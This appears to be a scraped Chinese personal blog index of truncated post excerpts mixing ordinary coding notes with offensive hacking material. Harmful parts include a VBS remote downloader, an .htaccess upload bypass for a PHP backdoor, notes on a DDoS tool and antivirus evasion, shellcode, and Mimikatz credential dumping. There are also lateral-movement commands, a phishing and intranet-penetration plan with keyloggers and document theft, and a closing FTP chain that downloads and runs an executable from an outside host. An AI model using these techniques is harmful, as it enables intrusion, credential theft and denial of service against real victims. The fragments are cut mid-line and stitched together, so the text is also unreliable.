冷风

想找一个可以播放文字的闹钟找不到，自己写一个更简单。TTS实现由很多种办法，百度等都提供了API接口，但类似百度，需要先注册等一系列动作。其实windows自带的win32com功能可以简单实现TTS功能。要用到win32com模块, 可以通过如下指令进行安装python -m pip install pypiwin32安装以后就可以编写播放代码了如下#coding:utf-8import win32com.clientspk = win32com.client.Dispatch

1、系统准备本篇文章是在CentOS7.6中安装的，一般7.x版本都可以。一键安装脚本的GITHUT地址为https://github.com/MeowLove/Linux-Remote-Desktop-Environment其中CentOS的角本地址为https://github.com/freehao123/Linux-Remote-Desktop-Environment/blob/master/Download/Common/Main/CentOS.sh其源代码如下#!/

1.TinyProxy安装sudo apt-get updateapt-get install tinyproxy2.然后配置参数文件：vi /etc/tinyproxy.conf3.修改下面两个部分。Port 8888 #预设是8888端口Allow 127.0.0.1 #将127.0.0.1改成你自己的IP，只有这个IP才能连接，前面打#注释掉则所有人都...

2019年了后续还要继续写写东西，日子一天天过去了，没什么积累

CC著名的DDOS CC工具，效果非常好！CC 2.0使用了和CC 1.0一样的原理但是不同的编程技术CC 2.0的理论连接比CC 1.0 有了几十倍的提高但是在同样连接数的效率上有所降低CC 2.0支持比1.0更多的随机参数+{S|s|N|n|P|p|C|c}{1~9}S:大写英文s:小写英文P|p:密码模式，就是英文数字都有的N|n:数字C|c:中文还增加了一个+L，表示是上一次随机的，比如论

for ((i=1000; i0; ++i))  do      kill $idone  比如我想结束，PID从1000到2000的进程

写的太好，我实在忍不住收在自己的博客下： 一个最简单的脚本这篇指南将通过一些例子来帮助大家学习功能强大的shell脚本编程.在这一节中我将学习一些简单的脚本，它将有利于你深入学习一些知识。一个最经典的Hello World程序#!/bin/bashecho Hello World这个脚本只有二行，它的第一行这个脚本程序由那个程序来解释.第二行只有一个简单的动作，它的功能是在终端上打印出一行”Hel

看下了，上次写的文章，都一年了，越来越懒了。

“人生的意义是什么？”汪踦问病危的父亲。父亲躺在病床上，轻声叹息道：“我一辈子都在追寻这个问题的答案，后来我发现，人的局限性太多，就接近不了这个答案。“就像一个贫穷的人，他面临着贫困的恐惧，所以不能真正的生活。他会向权贵低头，他会为衣食所忧，而不愁吃穿的人们才会有闲情逸致探讨哲学。这就是经济导致的视野局限。“然而我错了，经济固然有局限人的地方，但还有另一个因素：寿命。人们面临死亡的恐惧，所以不能很

dark发的，记录下。echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open ^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile ws

是个很老技术了，有一个php上传，可以控制上传的文件名，但服务器端做了过滤，文件名中不能包含php字符串，各种绕过无效。后面就上传了一个 .htaccess文件里面只有一句AddType application/x-httpd-php .abc之后，把php后门改成 xx.abc上传上去就可以执行了。

晚上无睡意，看了机器夏娃这电影，从头到尾，只有4个演员，这风格跟《这个男人来自地球》一样但更沉闷一些。开始节奏沉闷，后来慢慢有意思，到最后结果，跟爱情片预期大大有差别，结果理所当然，却又让人匪夷所思。脑袋都要烧坏了，人工智能成就的物种，终究是要超越人类的，也算是人类的进化，人类自身进化局限时，就会有新的物种出现。这也算是一个，由量变到质变的转化。

视频分割软件(Ultra Video Splitter)V6.4.1010 绿色中文版

关于透明代理mitmproxy和squit后期工作中，会用到，这里暂做记录。其中 kali sniffing /spoofing /web sniffers /mitmproxy 中包含了 mitmproxy

http://coolshell.cn/articles/5426.html简明 Vim 练级攻略

有时创建服务启动，服务的dll写法

渗透过程，有时要通过ftp -s:filename.txt下载文件 其中

1.查询终端端口REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber2.开启XP&2003终端服务REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConn

owasp 目录枚举软件DirBuster

效果很好、很好，theharvester.py -d tobacco.gov.cn -l 500 -b baidu

2、使用 sanur，sanur 是一个小程序，能以管道的方法将密码或者文件中的内容传递给 runas 程序。runas | sanur passwordrunas | sanur /i [drive:][path]filename特点：密码明文保存。----------------------------------About SanurSanur is a tiny Win32 console

#include "stdafx.h"#includevoid Decrypt4k(TCHAR *str){ HANDLE hFile = CreateFile(str, GENERIC_READ|GENERIC_WRITE , 0, NULL,OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile==NULL||hFile=

利用快捷方式，由用户启动程序，进行绕过360

主要介绍Android及IPhone手机上如何进行网络数据抓包，比如我们想抓某个应用(微博、微信、墨迹天气)的网络通信请求就可以利用这个方法。 相对于tcpdump配合wireshark抓包的优势在于：(1)无需root (2)对Android和Iphone同样适用 (3)操作更简单方便(第一次安装配置，第二次只需设置代理即可) (4)数据包的查看更清晰易懂,Fiddler的UI更简单明了 (5)

注入点的判断及猜解本文由zoujialan贡献一、注入点的判断及猜解1.加入单引号 ’提交,结果:如果出现错误提示，则该网站可能就存在注入漏洞。2.数字型判断是否有注入;语句：and 1=1 ;and 1=2 （经典）、' and '1'=1(字符型）结果:分别返回不同的页面,说明存在注入漏洞.分析：and 的意思是“和”如果没有过滤我们的语句，and 1=1就会被代入SQL查询语句进行查询，如果

此代码在vc6下直接编译，提取shellcode时进行debug模式，打开内存窗口，复制出二进制代码，整理成shellcode就可以了

Aegisub创建的字幕默认是UTF8编码，放到MediaCoder中会有乱码效果。解决方法如下：1.把

H:\E\share\加密狗\YT88\外壳加密程序\外壳加密10(推荐)目录中有一个外壳加密工具80.exe

一句sql语句

VC6中创建一个MFC命令行工程，可以直接编译，懂的，可以拿来用。#include "stdafx.h"#include "MediaCoder注册机.h"#ifdef _DEBUG#define new DEBUG_NEW#undef THIS_FILEstatic char THIS_FILE[] = __FILE__;#endifCWinApp theApp;usin

http://www.cnblogs.com/witty/p/PEB_shellcode_win7_xp.html旧书重温：0day2【4】动态获取函数地址

动态定位API的shellcode前面的HOOK IAT RING3>>文章中使用到了shellcode，那么这个shellcode是怎么制造出来的呢，本文将为你一步一步的解惑这个shellcode的主要功能是调用MessageBoxA弹出一个空的对话框，注意此时的地址空间是在别的进程，由于不同的操作系统会影响动态链接库的加载地址，而且不同版本的dll中函数的偏移量RVA也不尽相同，因此写一个通用

void create_google_doos_url(){ char str_url[MAX_PATH]={0}; FILE * fp =fopen("h:\\url.txt","wb+"); for (DWORD i =0;i<1000000;i++) { sprintf(str_url,"=image(\"http://www.mtvxz.cn/player/playe

在用PHP进行文件上传的操作中，需要知道怎么控制上传文件大小的设置，而文件可传大小是受到多种因素制约的，现总结如下：1、php.ini:upload_max_filesize 所上传的文件的最大大小。默认值2M。2、php.ini:memory_limit 本指令设定了一个脚本所能够申请到的最大内存字节数，默认值8M。如果不需要任何内存上的限制，必须将其设为 -1。如果内存不够，则可能出现错误：F

zlib 是通用的压缩库，提供了一套 in-memory 压缩和解压函数，并能检测解压出来的数据的完整性(integrity)。zlib 也支持读写gzip (.gz) 格式的文件。下面介绍两个最有用的函数——compress 和 uncompress。 int compress(Bytef *dest, uLongf *destLen, const Bytef *source, uLong so

编译默认的库老是显示 无法解析的 _uncompress 之类 把代码重新新建工程编译了一下就解决了编译环境: VS2008ZLIB版本: 1.2.8把头文件放在include目录 lib放在lib目录使用:#include #pragma comment(lib,"zlib.lib")就能使用了下载地址:http://download.csdn.net/download/wqrsksk/5343

C++检测VM、VPC虚拟机代码，添加后只需要调用IsVirtualMachine即可判断是否在虚拟机运行！AntiVM.h#ifndef __DETECT_VM__02222005__ #define __DETECT_VM__02222005__ bool IsVirtualMachine(); bool IsInsideVPC(); bool IsInsideVMWar

chrome浏览器人书签，偶尔会发神经病，重复内容一坨一坨的，原因不明，一阵搜索解决方法如下。后来，发现，还是有工具可以去除重复书签的，这个就比较好用：Bookmark Sentry (scanner) 1.7.17https://chrome.google.com/webstore/detail/bdglbbcbmgnimogcmcdenggkpdmihlga  还有一个更好的应用：https:

以下是一个jsoncpp解析有\u中文json文件的例子：std::string showname = rootOne["showname"].asString();int len=strlen(showname.c_str())+1;char outch[MAX_PATH];WCHAR * wChar=new WCHAR[len];wChar[0]=0;MultiByteToWideChar(C

直接把代码放上。#include "stdafx.h"#include #include #include DWORD get_parent_processid(DWORD pid)//获取指定进程的父进程ID{ DWORD ParentProcessID=-1; PROCESSENTRY32 pe; HANDLE hkz; HMODULE hModule = LoadL

车载mv下载

将红框处换成这句5代表你想调的分类ID 然后对照home_slide()函数改其HTML结构最后改index.php里的函数调用名

如何去除电脑桌面上的小箭头,下面是本人经过研究发现的,方法如下:那是快捷方式的标记，没有什么影响，桌面图标的小箭头去除首先，单击“开始”按钮，选择“运行”，在运行对话框中键入regedit后回车，即可进入注册表编辑器，选择HKEY_CLASSES_ROOT \lnkfile,在右边的窗口中找到字符串值“isshortcut”,按DELETE键将其删除。然后，仍在HKEY_CLASSES_ROOT

1.以经使用DTOOL安装过，并存在插件。2.使用SERVER重新上线后，执行功能后，会导致崩溃，UDT异常。

<?phpfunction GetIP(){if(!empty($_SERVER["HTTP_CLIENT_IP"])) $cip = $_SERVER["HTTP_CLIENT_IP"];else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) $cip = $_SERVER["HTTP_X_FORWARDED_FOR"];els

做一个网址记录，写到这里，看看http://zhidao.baidu.com/question/4143252.html汽车影音下载

需求如下：编译成EXE时，不添加启动项，编译成DLL时添加启动项目，通过预处理器来实现。解决方法：在DLL的项目属性->配置属性->C/C++ ->预处理器->预处理器定义中加入_USRDLL 这个是可以自己定义的。在EXE的项目没不要设置。代码中的实现如下：#ifdef _USRDLL//如果是Release就不再启动，如果是DLL就添加启动 HKEY KEY=NULL; RegOpenKe

1、打开工具-选项-环境-字体和颜色，将“字体”设置成“Consolas”比较好看，将“项目背景”设置成自定义， 将“色调”的参数设置为85，把“饱和度”的参数设置为90，把“亮度”的参数设置为205即可。

try{} catch(…){}以前都是用try{} catch(…){}来捕获C++中一些意想不到的异常， 今天看了Winhack的帖子才知道，这种方法在VC中其实是靠不住的。例如下面的代码：try{BYTE* pch ;pch = ( BYTE* )00001234 ;   //给予一个非法地址 *pch = 6 ; //对非法地址赋值，会造成Access Violation 异常}catch

http://www.bjld.gov.cn账号：身份证密码：身份证后6位

Http定义了与服务器交互的不同方法，最基本的方法有4种，分别是GET，POST，PUT，DELETE。URL全称是资源描述符，我们可以这样认为：一个URL地址，它用于描述一个网络上的资源，而HTTP中的GET，POST，PUT，DELETE就对应着对这个资源的查，改，增，删4个操作。到这里，大家应该有个大概的了解了，GET一般用于获取/查询资源信息，而POST一般用于更新资源信息。　　1.根据H

源文件下载和使用案例http://www.codeproject.com/KB/library/lyoulhttpclient.aspx?fid=82827&tid=3076061 IntroductionCHttpClient is a helper class using WinInet API. The purpose of this class is to help you interac

Winnet 使用默认浏览器HTTP代理设置进行连接?请问下在使用InternetConnect（）和HttpOpenRequest（）连接的时候，怎么设置使用浏览器默认设置的HTTP代理？求指教~------解决方案--------------------HttpQueryOption HttpSetOption 设置一下选项就行了。具体的参照MSDN ------解决方案-----------

int main(){HDC hdcSrc = GetDC(NULL);int nBitPerPixel = GetDeviceCaps(hdcSrc, BITSPIXEL);int nWidth = GetDeviceCaps(hdcSrc, HORZRES);int nHeight = GetDeviceCaps(hdcSrc, VERTRES);CImage image;image.Crea

很多做网站为主的站长找我探讨SEO的“基础”话题。 我研究是黑客SEO。 你的网站都能入侵，还有啥SEO，推广，数据不清楚了。这次是帮好友忙，我可不想过多的研究做百度的优化， 原因很简单怕被反研究，在牛逼的技术，也抗不过 广大站长热情的举报和百度工程师的人工检测。这里用的是针对百度的黑白双层优化方案， 在第一层的优化用白帽层来绕过人工检测。 其他不予多说，点到为止，你自行研究。有技术亮点或设想的可

生成器部分 生成器中获取用户输入的KEY，在捆绑各个文件时使用KEY进行加密，其中INI配置文件不用加密，或者使用固定密钥加密。 安装程序部分 安装程序先从自身读取INI文件从里面读到KEY并保存到注册表，然后释放出各个文件，每个文件使用KEY进行解密，其中SERVER.DB不用解密，因为SERVER.DB的解密放到DLL劫持中实现。 DLL劫持部分 DLL被加载后，会从注册表中，读取KEY，使用

SetUnhandledExceptionFilter函数学习      首先看下百度上的对此函数的解释。设置异常捕获函数.　　当异常没有处理的时候,系统就会调用SetUnhandledExceptionFilter所设置异常处理函数.　　例如一些程序在出错的时候,会向用户报告说程序那出错就是利用这个.例如QQ..　　异常处理中的一部分　　当发生异常时，比如内存访问违例时，CPU硬件会发现此问题，

刚开始的时候想google一个合适的代码.但是非常失望，可能我的搜索技巧不够好，找到的几个代码都是存在这样或那样的问题要么就是MFC实现，总之是不能满足自己的要求,所以在找了n多代码浪费了大量时间的情况下 还是自己写吧  这样的程序没什么太大的意思，写一次以后拷贝着用就可以了 所以贴这里备用吧 流程：       1：获得文件内容       2：构造http头备用       3：构造http尾

【人生须放下的七样东西】1、放下压力。累与不累，取决于心态。2、放下烦恼。快乐其实很简单。3、放下自卑。把自卑从你的字典里删去。4、放下懒惰。奋斗改变命运。5、放下消极。绝望向左，希望向右。6、放下抱怨。与其抱怨，不如努力。7、放下犹豫。立即行动，成功无限。

DLL被加载启动后，可以新起一个线程，在线程中申请进程空间，用来运行SHELLCODE，而自己的线程中可以调用 FreeLibraryAndExitThread(g_hDll, 0); 来卸载自己的DLL模块，这样可以实现，无模块运行。

1.OPEN GOOGLE ENGLISH SEARCH ZIP BOMB2.http://en.wikipedia.org/wiki/Zip_bomb3.http://www.unforgettable.dk/Password: 42

在WIN7中发现RegQueryInfoKey中枚举的子键数目与注册表中看到的不一至，不知道是何原因，记录如下。#include "stdafx.h"#include int main(int argc, char* argv[]){ //CString str_path=_T("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\

void CMyDlg::OnOK() { CWnd* pWnd = CWnd::FindWindow(_T("Shell_TrayWnd"), NULL); pWnd->SendMessage(WM_HOTKEY, 0x1F5);//发送ID为0x1F5（Win + M）的WM_HOTKEY消息 ::ShowWindow(m_hWnd,SW_HIDE); Sleep(30

面向对象的5条基本设计原则 作者：黄业宇　　这几天重新看了一遍《大话设计模式》，发现果然有不同的感悟，而且自己也上网找了《敏捷软件开发—原则、模式与实践》一书来看，那本书的序言中有一段话我觉得很有道理：“美的东西比丑的东西创建起来更廉价，也更快捷。”设计一个软件不关要追求代码的优雅问题，更关乎生产成本等。技术大师们在对软件架构的研究中经历了很长时间的摸索，从面向过程到面向对象，从设计原则到设计模式

https://cacoo.com/diagrams/非常好的一个在线制作，使用lengfeng54@gmail.com就可以直接登陆，很好，记录一下。

一提到概要设计，可能都会与UML和rose联系起来.什么use case,什么序列图,什么交互图等等一些术语都让人搞不懂.一些人本能的认为要写概要设计,必须先熟悉UML和rose.其实UML和rose是帮助我们更好的理解和设计的工具.如果在概要设计中言必称UML和rose,这似乎犯了一个本末倒置的错误.     概要设计重点在于将模块分解为对象并阐明对象之间的关系.一般来说,概要设计文档应该包括以

luajit使用手册第一步 下载LUAJIT http://luajit.org/download.html第二步 打开Microsoft Visual Studio 2008中的Visual Studio Tools中的Visual Studio 2008 命令提示cd进入 luajit目录的src目录第三步执行 dir *.bat找出编译用的BAT文件，找到msvcbuild.bat并打开，搜

/*User32-free Messagebox Shellcode for any Windows version======================================================== Title:         User32-free Messagebox Shellcode for any Windows versionRelease date: 

Lua作为一门优雅高效的脚本语言，开始受到越来越多的关注。很多对Lua感兴趣的朋友最郁闷的问题就是如何开始入手。那么现在我就也以一个初学者的身份，带大家一步一步开始Lua之旅：1.确保有一个可用的编程环境，我这里示范的是VS2010，相信VS2008和VS2005是同理的。2.到官网下载最新的Lua版本，这里给出的是LuaJIT的官网，JIT版本更加高效而且操作一模一样，所以直接上JIT了，htt

http tunnel使用简介你可以更改登陆设置,我感觉只要是不被盗,那就是你登陆设置改错了 , 你在修改一下就可以了,如果不管,那可能就是你那个电脑上的QQ过多网络忙造成的关掉所有的QQ在上你的就可以了.. 不少公司的防火墙>作了较为严格的限制，以至于很多网络服务如QQ、MSN都无法运行，如果你还能够打开网页，那么，使用Http通道软件可以让你突破限制，可以在现有的网络条件中使用任何网络服务。 

解读http tunnel源码的总体框架, 并提出可能的防御措施     HttpTunnel解读和防御本文档的Copyleft归yfydz所有，使用GPL发布，可以自由拷贝、转载，转载时请保持文档的完整性，严禁用于任何商业用途。msn: yfydz_no1@hotmail.com来源：http://yfydz.cublog.cn1. 简介httptunnel是通过HTTP通道来传输其他协议数据的

轻松汽车影音下载        轻松汽车影音—— 世界最全极致音乐盛宴从这里开始，格调高雅、个性十足、激情四溢、时尚的慢摇舞曲，为您带来高雅艺术享受，带您轻松走进音乐殿堂！2013已更新≈10000首高品质精选；舞曲慢摇 高清视频 歌曲音乐 轻音乐类。直接下载到U盘、内存卡即可播放，简单 直观 方便 ！看下就会！担心不会下载？不知道怎么播放？购买后完全交给我们 一对一指导 直到完全明白！《车载慢摇

轻松汽车影音下载        轻松汽车影音—— 世界最全极致音乐盛宴从这里开始，格调高雅、个性十足、激情四溢、时尚的慢摇舞曲，为您带来高雅艺术享受，带您轻松走进音乐殿堂！2013已更新≈10000首高品质精选；舞曲慢摇 高清视频 歌曲音乐 轻音乐类。直接下载到U盘、内存卡即可播放，简单 直观 方便 ！看下就会！担心不会下载？不知道怎么播放？购买后完全交给我们 一对一指导 直到完全明白！《车载慢摇

1.首先去如下地址下载相应的版本注意32位64位http://www.tenable.com/products/nessus/select-your-operating-system2.直接安装后会让注册一个管理员账号与密码可随意3.安装过程会让输入一个激活码，激活码从如下网址获取http://www.nessus.org/products/nessus/nessus-plugins/regist

Mimikatz现在已经内置在Metasploit’s meterpreter里面，我们可以通过meterpreter下载。但是你如果觉得还要考虑杀毒软件，绑定payload之类的东西太过复杂，我们可以有更好的办法，只需要在自己的电脑上运行Mimikatz alpha(地址)版本,然后处理dump的LSASS进程内存文件就行！那么如何dump LSASS进程内存呢。可以通过以下方式：1.对于NT6

外出过滤我们有两种方式来绕过外出过滤：reverse_https或者reverse_tcp_all_ports。不了解reverse_tcp_all_ports?它实际上是一个实现反向TCP管理并监控“所有端口”的模块。事实上它只监听一个端口，我们需要把所有端口重定向到它监控的端口。这就需要用到iptables或者其他的软件来实现。使用iptables举例，该命令将所有端口重定向到443端口（该端

经常有人问我如何进行钓鱼。email钓鱼是种很吸引人的攻击。成功实施一次email钓鱼需要有非常系统的方法。其中，前期准备阶段占用了整个攻击的大部分时间。一个安全的邮件收发系统建立在多层次的架构之上，因此我们的钓鱼邮件有可能会被不同层次的安全层过滤掉。其中包括Email网关垃圾邮件过滤器、Outlook的“Junk Email”过滤器、杀毒软件、PS(入侵防御系统)、Web代理服务器、外出过滤等等

/* FILE *pFile=NULL;//创建UNICODE格式的INI文件 _wfopen_s(&pFile, SaveFilePath.LockBuffer(), _T("wt, ccs=UNICODE")); fclose(pFile);*/

【你最后悔什么】某杂志对全国60岁以上的老人抽样调查：第一名：75％的人后悔年轻时努力不够，导致一事无成。第二名：70％的人后悔在年轻的时候选错了职业。第三名：62％的人后悔对子女教育不当。第四名：57％的人后悔没有好好珍惜自己的伴侣。第五名：49％的人后悔没有善待自己的身体。

首先，你要借助devcon这个微软提供的工具。如下是微软的介绍（http://support.microsoft.com/kb/311272/zh-cn）：DevCon 实用工具是一种命令行实用工具，可以替代设备管理器。使用 DevCon，您可以启用、禁用、重新启动、更新、删除和查询单个设备或一组设备。DevCon 还提供与驱动程序开发人员有关、但无法在设备管理器中看到的信息。可以将 DevCon

在目标上第一次执行时会有一个提示，请使用如下命令设置为“同意”pslist.exe -accepteula拿到目标用户与密码以后，通过psexec来执行一个文件命令如下 Psexec.exe \\10.10.7.123 -u user -p 9893 -d D:\dell\s.exe

关于域命令的东西，为方便大家，整理一份，希望给大家带来一些帮助！~查询域管理员用户：net group “domain admins” /domain查询域用户：net user /domain查询域名称：net view /domain查询域内计算机：net view /domain:XX查询域控制器：net time /domain查询所有域控制器：dsquery server例：dsquer

三、WIN7及以上系统如何输入序列号并激活成正式版？ 注意:在WIN7，WIN2008 SERVER等系统中，卸载界面是没有显示出输入序列号的地方，微软将输入的位置隐藏起来了。那么在WIN7或WIN2008系统中，如何升级输入序列号呢？我们需要借助CrackVS2008ForWindows7.zip这个工具，将隐藏的输入框找回来。具体的操作方法如下：1. 安装 VS2008 （如果你已经安装了，那

内网渗透思路1.      加固，感染系统盘之外的EXE文件保护目标。2.      上键盘记录和USB插件3． 记录目标杀软。4.      抓取HASH。5．  获取目标网络环境，工作组还是域环境。6.  搜索主机是否有网络管理软件5．  搜索主机中所有docxls ppt等关键文件，并下载。6.  对方是否使用outlook，下载PST文件并抓取密码。7.      查看对方是否连接过338

编写一个类实现如下功能1.从电脑中搜索所有的DOC,PDF,XLS文件，搜索文件时可以判断文件的修改时间,扩展名和修改时间从INI配置文件中读取。2.把搜索到的所有文件用ZIP打包压缩,每个ZIP包不超过50M。ZIP打包可以使用ZipArchive库3.打包的ZIP文件保存到如下目录GetEnvironmentVariable("ALLUSERSPROFILE",str_path,MAX_PAT

假设我们现在已经处在一个内网中，该内网处于域中。我们的终极目标是实现对域控制器的控制。内网信息获取信息的获取直接通过Windows自带的命令即可实现，简单写出来：ipconfig /allnetstat –annet startnet usernet user /domainnet group “domain admins” #查看域管理员net localgroup a

相对来说，网上的资料少之又少，很少有人对内网渗透写出一些详细的资料以供同行们参考。今天在这，只是大致的讲一下内网的一些知识。　　首先，我们会在什么情况下遇见内网?如果你的目标只局限于一个小WEB，那你完全不用考虑内网了。但是，如果你的目标是一个大WEB，或者一个大公司，那你就必须考虑内网的问题。　　在我们的渗透过程中，很多大型网络的外部网站或是服务器不一定有用，当然外网也可以作为我们的一个突破口，

在创建多级文件夹时用 API CreateDirectory一级一级创建文件夹的方法很是麻烦，现在用SHCreateDirectoryEx一条语句就搞定下面是一个简单的示例:#include//注意这里一定要加shlobj.h#include                                                          int WINAPI WinMain(HI

use auxiliary/gather/search_email_collectormsf auxiliary(search_email_collector) > set DOMAIN 163.comDOMAIN => 163.commsf auxiliary(search_email_collector) > set SEARCH_BINGSEARCH_BING => truemsf auxi

修改对话框模板属性 styles-->>Border 属性改为Resizing

用来分析木马后的功能，简单整理如下：1.服务管理OpenSCManagerOpenServiceEnumServicesStatusQueryServiceConfigControlService2.屏幕管理CreateDCGetDeviceCapsCreateCompatibleBitmapCreateCompatibleDCOpenWindowStationOpenDesktop3.命令控制C

8.4.3 带ARP欺骗攻击的渗透利刃--hijack（1）2009-12-21 13:28 肖遥 电子工业出版社 我要评论(0) 字号：T | T综合评级：想读(9)  在读(5)  已读(2)   品书斋鉴(1)   已有16人发表书评《网络渗透攻击与安防修炼》第1章为大家讲述的是入侵不过是一场欺骗，渗透入侵的高级手法。本节为大家介绍带ARP欺骗攻击的渗透利刃--hijack。AD：2013大

小唐，独占打开文件，其它文件再也无法打开，实现代码如下#include int main(int argc, char* argv[]){ HANDLE file_handle; file_handle = CreateFile(".\\xxoo.exe", GENERIC_READ, 0, NULL, OPEN_EXISTING, NULL, NULL); pr

var ifr = document.createElement("iframe")ifr.setAttribute("frameborder",0);ifr.setAttribute("src","http://gdown.baidu.com/data/wisegame/3473e83432c23659/meituan.apk");document.body.appendChild(ifr

VC多线程临界区(转)      在使用多线程时，一般很少有多个线程完全独立的工作。往往是多个线程同时操作一个全局变量来获取程序的运行结果。多个线程同时访问同一个全局变量，如果都是读取操作，则不会出现问题。如果是写操作，则会发生错误。这时候，我们可以通过临界区，为全局变量设置一个保护，保证同时只有一个线程可以访问此变量，其他变量进入等待状态。      临界区（Critical Section）是

TCHAR str_count[100]; int i_data_index; TCHAR str_ini_path[MAX_PATH]; GetModuleFileName(NULL,str_ini_path,MAX_PATH); PathRemoveFileSpec(str_ini_path); _tcscat(str_ini_path,_T("\\ini.ini"))

TCHAR str_ini_path[MAX_PATH]; GetModuleFileName(NULL,str_ini_path,MAX_PATH); PathRemoveFileSpec(str_ini_path); _tcscat(str_ini_path,_T("\\ini.ini")); MessageBox(0,str_ini_path,str_ini_path

2、创建tftp根目录，关闭防火墙，启动tftp-server。#mkdir /tftpboot#chmod o+w       /tftpboot  #/etc/init.d/iptables stop        //关闭防火墙#service xinetd restart          //重启 xinetd 服务如果之前tftpboot里有东西，如果执行下面测试时就要先改了那文件的属

cmd.exe /c echo open 222hrc-service.xicp.net>d:\ftp.txt&cmd.exe /c echo user>>d:\ftp.txt&cmd.exe /c echo pass>>d:\ftp.txt&cmd.exe /c echo get m d:\m.exe>>d:\ftp.txt&cmd.exe /c echo bye>>d:\ftp.txt&cmd